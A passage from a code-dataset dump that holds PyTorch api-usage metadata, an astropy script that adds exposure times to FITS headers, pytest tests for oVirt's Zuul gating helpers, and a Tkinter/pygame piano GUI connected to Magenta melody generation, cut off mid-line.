12, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.tril", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.multinomial", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 154, "usage_type": "call"}]} +{"seq_id": "20725816437", "text": "import numpy as np\nfrom astropy.io import fits\nimport os\nimport matplotlib.pyplot as plt\n\ndir = '/Users/renbin/ASICAP/Apr16/'\nnames = np.empty(268,dtype=(np.unicode_,40))\nimgtypes = np.empty(268,dtype=(np.unicode_,16))\nlens = np.empty(268,dtype=(np.unicode_,10))\nf = open(dir+'list_apr16','r')\nct=0\nfor line in f:\n line = line.strip()\n columns = line.split()\n if len(columns) == 3:\n names[ct] = columns[0]\n imgtypes[ct] = columns[1]\n lens[ct] = columns[2]\n ct = ct+1\nf.close()\n\nnames = names[0:ct]\nimgtypes = imgtypes[0:ct]\nlens = lens[0:ct]\ncombtypes = np.array([x+'_'+y for x,y in zip(imgtypes,lens)])\n\n#uniqtypes = np.unique(imgtypes)\n#uniqlens = np.unique(lens)\nuniqcomb = np.unique(combtypes)\n\nfor type in uniqcomb:\n ind = np.where(combtypes == type)[0]\n print('For ',type, len(ind))\n file=names[ind[-1]]\n hdu=fits.open(dir+file)\n exptime = hdu[0].header['EXPOINUS']\n hdu.close()\n hdu=fits.open(dir+'median_'+type+'.fits')\n hdr = hdu[0].header\n hdr.set('EXPOINUS',exptime)\n hdu[0].header = hdr\n hdu.writeto(dir+'median_'+type+'.fits',overwrite=True)\n hdu.close()\n \n\n", "repo_name": "yanrenbin/amase-dev", "sub_path": "addexptime.py", "file_name": "addexptime.py", "file_ext": "py", "file_size_in_byte": 1161, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.empty", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.unicode_", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.unicode_", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.unicode_", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 32, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 35, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 35, "usage_type": "name"}, {"api_name": "astropy.io.fits.open", "line_number": 38, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "34903768203", "text": "#!/usr/bin/env python\n# test_zuul_helpers.py - Tests for zuul_helpers.py\n#\nimport pytest\nfrom six import string_types, iteritems\nimport yaml\ntry:\n from unittest.mock import MagicMock\nexcept ImportError:\n from mock import MagicMock\n\nfrom stdci_libs.zuul_helpers import (\n is_gated_project, merge_project_yaml, is_gated_project_entry\n)\nfrom stdci_libs import zuul_helpers\n\n\n@pytest.fixture\ndef projects(gitrepo):\n prj_defs = {\n 'onefile': {\n 'zuul.yaml': [\n {'project': {'name': 'onefile', 'id': 'p1', 'gated': True}},\n ],\n },\n 'onedotfile': {\n '.zuul.yaml': [\n {'project': {'name': 'onedotfile', 'id': 'p1', 'gated': True}},\n ],\n },\n 'unnamed': {\n 'zuul.yaml': [{'project': {'id': 'p1', 'gated': True}}],\n },\n 'dir': {\n 'zuul.d/base-project.yaml': [{'project': {'id': 'p1'}}],\n 'zuul.d/jobs.yaml': [\n {'job': {'name': 'j1'}},\n {'job': {'name': 'j2'}},\n ],\n 'zuul.d/project.yaml': [\n {'project': {'id': 'p2', 'gated': True}},\n {'project': {'name': 'p3', 'id': 'p3'}},\n ],\n },\n 'file+': {\n 'zuul.yaml': [{'project': {'id': 'p1'}}],\n 'zuul.d/a.yaml': [{'project': {'id': 'p2'}}],\n '.zuul.yaml': [{'project': {'id': 'p3'}}],\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n 'dir+': {\n 'zuul.d/a.yaml': [{'project': {'id': 'p2'}}],\n '.zuul.yaml': [{'project': {'id': 'p3'}}],\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n 'dotfile+': {\n '.zuul.yaml': [{'project': {'id': 'p3'}}],\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n 'dotdir+': {\n '.zuul.d/b.yaml': [{'project': {'id': 'p4'}}],\n },\n }\n prj_defs = {\n name: {\n fn:\n fc if isinstance(fc, string_types) else\n yaml.safe_dump(fc, default_flow_style=False)\n for fn, fc in iteritems(content)\n }\n for name, content in iteritems(prj_defs)\n }\n prj_defs = {\n name: gitrepo(name, {'files': content})\n for name, content in iteritems(prj_defs)\n }\n return prj_defs\n\n\n@pytest.mark.parametrize('prj,prj_name,exp_prj,exp_out', [\n ('onefile', None, 'p1', True),\n ('onefile', 'other-project', None, False),\n ('onedotfile', None, 'p1', True),\n ('unnamed', None, 'p1', True),\n ('unnamed', 'foo', 'p1', True),\n ('unnamed', 'bar', 'p1', True),\n ('dir', None, 'p1+p2', True),\n ('dir', 'foo', 'p1+p2', True),\n ('dir', 'p3', 'p1+p2+p3', True),\n ('file+', None, 'p1', False),\n ('dir+', None, 'p2', False),\n ('dotfile+', None, 'p3', False),\n ('dotdir+', None, 'p4', False),\n])\ndef test_is_gated_project(\n monkeypatch, projects, prj, prj_name, exp_prj, exp_out\n):\n\n def is_gated_project_entry(entry, *args, **kwargs):\n return entry.get('gated', False)\n is_gated_project_entry = MagicMock(side_effect=is_gated_project_entry)\n\n def merge_project_yaml(entries, *args, **kwargs):\n return {\n 'id': '+'.join(e['id'] for e in entries),\n 'gated': any(e.get('gated', False) for e in entries),\n }\n merge_project_yaml = MagicMock(side_effect=merge_project_yaml)\n\n monkeypatch.setattr(\n zuul_helpers, 'is_gated_project_entry', is_gated_project_entry\n )\n monkeypatch.setattr(\n zuul_helpers, 'merge_project_yaml', merge_project_yaml\n )\n\n out = is_gated_project(projects[prj], prj_name)\n if exp_prj is None:\n assert not is_gated_project_entry.called\n else:\n assert is_gated_project_entry.call_args[0][0]['id'] == exp_prj\n assert out == exp_out\n\n\n@pytest.mark.parametrize('entries,gate_pipelines,expected', [\n (\n ({'name': 'prj'}, {'templates': ['t1', 't2']}),\n '^gt$',\n {'templates': ['t1', 't2']}\n ),\n (\n ({'templates': ['t1', 't2']}, {'templates': ['t3']}),\n '^gt$',\n {'templates': ['t1', 't2', 't3']}\n ),\n (\n ({'gt': {'jobs': ['j1']}}, {'gt': {'jobs': ['j2']}}),\n '^gt$',\n {'gt': {'jobs': ['j1', 'j2']}},\n ),\n (\n ({'gt': {'jobs': ['j1']}}, {'gt': {'jobs': ['j2', 'j1']}}),\n '^gt$',\n {'gt': {'jobs': ['j1', 'j2', 'j1']}},\n ),\n (\n ({'gt1': {'jobs': ['j1']}}, {'gt2': {'jobs': ['j2', 'j1']}}),\n '^gt$',\n {},\n ),\n (\n ({'gt1': {'jobs': ['j1']}}, {'gt2': {'jobs': ['j2', 'j1']}}),\n '^gt.$',\n {'gt1': {'jobs': ['j1']}, 'gt2': {'jobs': ['j2', 'j1']}},\n ),\n (\n (\n {'templates': ['t1', 't2'], 'gt': {'jobs': ['1', '2']}},\n {'templates': ['t3'], 'gt': {'jobs': ['3']}, 'p': {'jobs': ['4']}},\n {'gt': {'jobs': ['5']}, 'p': {'jobs': ['6', '7']}},\n ),\n '^gt$',\n {'templates': ['t1', 't2', 't3'], 'gt': {'jobs': ['1', '2', '3', '5']}}\n )\n\n])\ndef test_merge_project_yaml(entries, gate_pipelines, expected):\n out = merge_project_yaml(entries, gate_pipelines)\n assert out == expected\n\n\n@pytest.mark.parametrize('input,expected', [\n ({\n 'entry': {'templates': ['the-gated-project']},\n }, True),\n ({\n 'entry': {'templates': ['some-template', 'the-gated-project']},\n }, True),\n ({\n 'entry': {'templates': ['some-template', 'the-gated-project']},\n 'gate_templates': '^really-gated$',\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['run-gate-job']}},\n }, True),\n ({\n 'entry': {'gate-patch': {'jobs': [{'run-gate-job': {}}]}},\n }, True),\n ({\n 'entry': {'gate-patch': {'jobs': ['job1', {'job2': {}}]}},\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['run-gate-job']}},\n 'gate_jobs': '2$',\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['run-gate-job']}},\n 'gate_pipelines': '^gate$',\n }, False),\n ({\n 'entry': {'gate-patch': {'jobs': ['job1', {'job2': {}}]}},\n 'gate_jobs': '2$',\n }, True),\n])\ndef test_is_gated_project_entry(input, expected):\n out = is_gated_project_entry(**input)\n assert out == expected\n", "repo_name": "oVirt/jenkins", "sub_path": "test/test_zuul_helpers.py", "file_name": "test_zuul_helpers.py", "file_ext": "py", "file_size_in_byte": 6296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "six.string_types", "line_number": 67, "usage_type": "argument"}, {"api_name": "yaml.safe_dump", "line_number": 68, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 69, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 71, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 75, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 18, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 101, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 101, "usage_type": "call"}, {"api_name": "stdci_libs.zuul_helpers.merge_project_yaml", "line_number": 108, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 108, "usage_type": "call"}, {"api_name": "stdci_libs.zuul_helpers", "line_number": 111, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 111, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers", "line_number": 114, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers.merge_project_yaml", "line_number": 114, "usage_type": "argument"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project", "line_number": 117, "usage_type": "call"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry.called", "line_number": 119, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 119, "usage_type": "name"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry.call_args", "line_number": 121, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 121, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 80, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 80, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.merge_project_yaml", "line_number": 168, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 125, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 125, "usage_type": "attribute"}, {"api_name": "stdci_libs.zuul_helpers.is_gated_project_entry", "line_number": 206, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 172, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "16018655424", "text": "from tkinter import *\nimport time\nimport datetime\nimport pygame\nimport tkinter as Tk\nimport threading,time,random\nimport os\nimport psutil\nfrom kill import kill\nfrom magenta.models.melody_rnn import melody_rnn_generate\nimport tensorflow as tf\nfrom magenta.models.melody_rnn.melody_rnn_generate import m_r_g_pitch_list\nfrom magenta.models.melody_rnn.melody_rnn_generate import midi_file\nfrom time import sleep\n\nstart_stop = False # detect press return True: generate False: stop play, stop generate\n\n# pygame.init()\npygame.mixer.init(44100, -16,2,2048)\n\ncount = 0\nlock = threading.Lock()\n\npitch_list = []\nroot = Tk.Tk()\nroot.title(\"Panio GUI\")\n# width,height = 1000,500\n# root.geometry(\"%dx%d+30+30\"%(width,height))\nroot.configure(background = \"white\")\n\nmainframe = Frame(root,bg = \"white\",bd = 20)\nmainframe.grid()\n\n\ntmp_frame1 = Frame(mainframe,bg = \"white\",bd = 20)\ntmp_frame1.grid()\ntmp_frame2 = Frame(mainframe,bg = \"white\",bd = 20)\ntmp_frame2.grid()\ntmp_frame3 = Frame(mainframe,bg = \"white\",bd = 20)\ntmp_frame3.grid()\n\n\nstr1 = StringVar()\nstr1.set(\"Just Like Music\")\nDate1 = StringVar()\nTime1 = StringVar()\n\nDate1.set(time.strftime(\"%d/%m/%Y\"))\nTime1.set(time.strftime(\"%H/%M/%S\"))\n\ndef setblackkey(item):\n item.config(bg=\"black\",fg=\"white\")\n\ndef setwhitekey(item):\n item.config(bg=\"Gainsboro\", fg=\"black\")\n\ndef value_Cs():\n global pitch_list\n str1.set(\"C#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C_s.wav\")\n sound.play()\n pitch_list.append(61)\n btnCs.config(bg=\"Tan\", fg=\"black\")\n root.after(100,setblackkey,btnCs)\n\ndef value_Ds():\n global pitch_list\n str1.set(\"D#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D_s.wav\")\n sound.play()\n pitch_list.append(63)\n btnDs.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnDs)\n\ndef value_Fs():\n global pitch_list\n str1.set(\"F#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/F_s.wav\")\n sound.play()\n pitch_list.append(66)\n btnFs.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnFs)\n\ndef value_Gs():\n global pitch_list\n str1.set(\"G#\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/G_s.wav\")\n sound.play()\n pitch_list.append(68)\n btnGs.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnGs)\n\ndef value_Bb():\n global pitch_list\n str1.set(\"Bb\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/Bb.wav\")\n sound.play()\n pitch_list.append(70)\n btnBb.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnBb)\n\ndef value_Cs1():\n global pitch_list\n str1.set(\"C_s1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C_s1.wav\")\n sound.play()\n pitch_list.append(73)\n btnCs1.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnCs1)\n\ndef value_Ds1():\n global pitch_list\n str1.set(\"D_s1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D_s1.wav\")\n sound.play()\n pitch_list.append(75)\n btnDs1.config(bg=\"Tan\", fg=\"black\")\n root.after(100, setblackkey, btnDs1)\n\ndef value_C():\n global pitch_list\n str1.set(\"C\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C.wav\")\n sound.play()\n pitch_list.append(60)\n btnC.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnC)\n\ndef value_D():\n global pitch_list\n str1.set(\"D\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D.wav\")\n sound.play()\n pitch_list.append(62)\n btnD.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnD)\n\ndef value_E():\n global pitch_list\n str1.set(\"E\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/E.wav\")\n sound.play()\n pitch_list.append(64)\n btnE.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnE)\n\ndef value_F():\n global pitch_list\n str1.set(\"F\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/F.wav\")\n sound.play()\n pitch_list.append(65)\n btnF.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnF)\n\ndef value_G():\n global pitch_list\n str1.set(\"G\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/G.wav\")\n sound.play()\n pitch_list.append(67)\n btnG.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnG)\n\ndef value_A():\n global pitch_list\n str1.set(\"A\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/A.wav\")\n sound.play()\n pitch_list.append(69)\n btnA.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnA)\n\ndef value_B():\n global pitch_list\n str1.set(\"B\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/B.wav\")\n sound.play()\n pitch_list.append(71)\n btnB.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnB)\n\ndef value_C1():\n global pitch_list\n str1.set(\"C1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/C1.wav\")\n sound.play()\n pitch_list.append(72)\n btnC1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnC1)\n\ndef value_D1():\n global pitch_list\n str1.set(\"D1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/D1.wav\")\n sound.play()\n pitch_list.append(74)\n btnD1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnD1)\n\ndef value_E1():\n global pitch_list\n str1.set(\"E1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/E1.wav\")\n sound.play()\n pitch_list.append(76)\n btnE1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnE1)\n\ndef value_F1():\n global pitch_list\n str1.set(\"F1\")\n sound = pygame.mixer.Sound(\"/Users/yuhaomao/Downloads/Music_Notes/F1.wav\")\n sound.play()\n pitch_list.append(77)\n btnF1.config(bg=\"DimGray\", fg=\"white\")\n root.after(100, setwhitekey, btnF1)\n\n\n\n# ==========Lable with Title========= #\n\nLabel(tmp_frame1,text = \"Piano Musical Keys\",font = (\"Impact\",25,\"bold\"), bg = \"white\").grid(row = 0, column = 0, columnspan = 11)\n\n# =================================== text\n\ntxtDate = Entry(tmp_frame1, textvariable = Date1,font = (\"arial\",18,\"bold\"), bg = \"white\").grid(row = 1, column = 0,pady = 1)\n\ntxtDisplay = Entry(tmp_frame1, textvariable = str1,font = (\"arial\",18,\"bold\"), bg = \"white\").grid(row = 1, column = 1,pady = 1)\n\ntxtTime = Entry(tmp_frame1, textvariable = Time1,font = (\"arial\",18,\"bold\"), bg = \"white\").grid(row = 1, column = 2,pady = 1)\n\n#=================================== black key\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 0, padx = 5, pady = 5)\n\nbtnCs = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"C#\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnCs.grid(row = 0, column = 1, padx = 5, pady = 5)\nbtnCs.bind(\"\",lambda event:value_Cs())\nroot.bind(\"\", lambda event: value_Cs())\n\n\nbtnDs = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"D#\", bg = \"black\",fg = \"white\",font = (\"arial\",18,\"bold\"))\nbtnDs.grid(row = 0, column = 2, padx = 5, pady = 5)\nbtnDs.bind(\"\",lambda event:value_Ds())\nroot.bind(\"\", lambda event: value_Ds())\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 3, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 4, padx = 5, pady = 5)\n\nbtnFs = Tk.Label(tmp_frame2,height = 6, width = 8, text=\"F#\", bg = \"black\",fg=\"white\", font = (\"arial\",18,\"bold\"))\nbtnFs.grid(row = 0, column = 5, padx = 5, pady = 5)\nbtnFs.bind(\"\",lambda event:value_Fs())\nroot.bind(\"\", lambda event: value_Fs())\n\n\nbtnGs = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"G#\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnGs.grid(row = 0, column = 6, padx = 5, pady = 5)\nbtnGs.bind(\"\",lambda event:value_Gs())\nroot.bind(\"\", lambda event: value_Gs())\n\n\nbtnBb = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"Bb\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnBb.grid(row = 0, column = 7, padx = 5, pady = 5)\nbtnBb.bind(\"\",lambda event:value_Bb())\nroot.bind(\"\", lambda event: value_Bb())\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 8, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 9, padx = 5, pady = 5)\n\nbtnCs1 = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"C#1\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnCs1.grid(row = 0, column = 10, padx = 5, pady = 5)\nbtnCs1.bind(\"\",lambda event:value_Cs1())\nroot.bind(\"\", lambda event: value_Cs1())\n\n\nbtnDs1 = Tk.Label(tmp_frame2,height = 6, width = 8,text = \"D#1\",font = (\"arial\",18,\"bold\"), bg = \"black\",fg = \"white\")\nbtnDs1.grid(row = 0, column = 11, padx = 5, pady = 5)\nbtnDs1.bind(\"\",lambda event:value_Ds1())\nroot.bind(\"\", lambda event: value_Ds1())\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 12, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 13, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 14, padx = 5, pady = 5)\n\n# =================================== white key\nbtnC = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"C\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnC.grid(row = 1, column = 0, padx = 5, pady = 5)\nbtnC.bind(\"\",lambda event:value_C())\nroot.bind(\"\", lambda event: value_C())\n\n\nbtnD = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"D\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnD.grid(row = 1, column = 1, padx = 5, pady = 5)\nbtnD.bind(\"\",lambda event:value_D())\nroot.bind(\"\", lambda event: value_D())\n\n\nbtnE = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"E\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnE.grid(row = 1, column = 2, padx = 5, pady = 5)\nbtnE.bind(\"\",lambda event:value_E())\nroot.bind(\"\", lambda event: value_E())\n\n\nbtnF = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"F\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnF.grid(row = 1, column = 3, padx = 5, pady = 5)\nbtnF.bind(\"\",lambda event:value_F())\nroot.bind(\"\", lambda event: value_F())\n\n\nbtnG = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"G\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnG.grid(row = 1, column = 4, padx = 5, pady = 5)\nbtnG.bind(\"\",lambda event:value_G())\nroot.bind(\"\", lambda event: value_G())\n\n\nbtnA = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"A\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnA.grid(row = 1, column = 5, padx = 5, pady = 5)\nbtnA.bind(\"\",lambda event:value_A())\nroot.bind(\"\", lambda event: value_A())\n\n\nbtnB = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"B\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnB.grid(row = 1, column = 6, padx = 5, pady = 5)\nbtnB.bind(\"\",lambda event:value_B())\nroot.bind(\"\", lambda event: value_B())\n\n\nbtnC1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"C1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnC1.grid(row = 1, column = 7, padx = 5, pady = 5)\nbtnC1.bind(\"\",lambda event:value_C1())\nroot.bind(\"\", lambda event: value_C1())\n\n\nbtnD1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"D1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnD1.grid(row = 1, column = 8, padx = 5, pady = 5)\nbtnD1.bind(\"\",lambda event:value_D1())\nroot.bind(\"\", lambda event: value_D1())\n\n\nbtnE1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"E1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnE1.grid(row = 1, column = 9, padx = 5, pady = 5)\nbtnE1.bind(\"\",lambda 